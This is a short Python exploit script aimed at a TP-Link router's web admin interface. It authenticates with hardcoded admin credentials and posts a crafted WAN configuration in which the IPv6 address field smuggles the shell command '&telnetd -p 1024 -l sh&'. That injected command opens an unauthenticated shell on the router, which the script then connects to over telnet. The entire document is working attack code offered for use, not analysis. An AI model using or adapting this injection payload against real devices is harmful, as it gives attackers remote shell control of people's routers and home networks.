#!/usr/bin/env python3

import requests
import base64
import os

tplink_user = "admin"
tplink_pass = "kj876fsd562489"
tplink_ip = "192.168.0.1"

tplink_url = "http://" + tplink_ip + "/cgi?2&2"
creds = tplink_user + ":" + tplink_pass
cookie = "Authorization=Basic " + base64.b64encode(creds.encode()).decode("ascii")
referer = "http://" + tplink_ip +"/mainFrame.htm"
post_exploit_cmd = "telnet " + tplink_ip + " 1024"

payload_template = """[WAN_ETH_INTF#1,0,0,0,0,0#0,0,0,0,0,0]0,1\r
X_TP_lastUsedIntf=ipoe_eth3_s\r
[WAN_IP_CONN#1,1,1,0,0,0#0,0,0,0,0,0]1,21\r
externalIPAddress=192.168.9.222\r
subnetMask=255.255.255.0\r
defaultGateway=192.168.9.2\r
NATEnabled=1\r
X_TP_FullconeNATEnabled=0\r
X_TP_FirewallEnabled=1\r
X_TP_IGMPProxyEnabled=1\r
X_TP_IGMPForceVersion=0\r
maxMTUSize=1500\r
DNSOverrideAllowed=1\r
DNSServers=192.168.9.3,0.0.0.0\r
X_TP_IPv4Enabled=1\r
X_TP_IPv6Enabled=0\r
X_TP_IPv6AddressingType=Static\r
X_TP_ExternalIPv6Address=OS_INJECTION_HERE\r
X_TP_PrefixLength=64\r
X_TP_DefaultIPv6Gateway=::\r
X_TP_IPv6DNSOverrideAllowed=0\r
X_TP_IPv6DNSServers=::,::\r
X_TP_MLDProxyEnabled=0\r
enable=1\r
"""

payload = payload_template.replace("OS_INJECTION_HERE", "::")
res = requests.post(tplink_url, data=payload, headers={"Referer": referer, "Cookie": cookie})
html = res.content.decode("utf-8")
print(html)

payload = payload_template.replace("OS_INJECTION_HERE", "&telnetd -p 1024 -l sh&")
res = requests.post(tplink_url, data=payload, headers={"Referer": referer, "Cookie": cookie})
html = res.content.decode("utf-8")
print(html)

print("Run post_exploit_cmd")
os.system(post_exploit_cmd)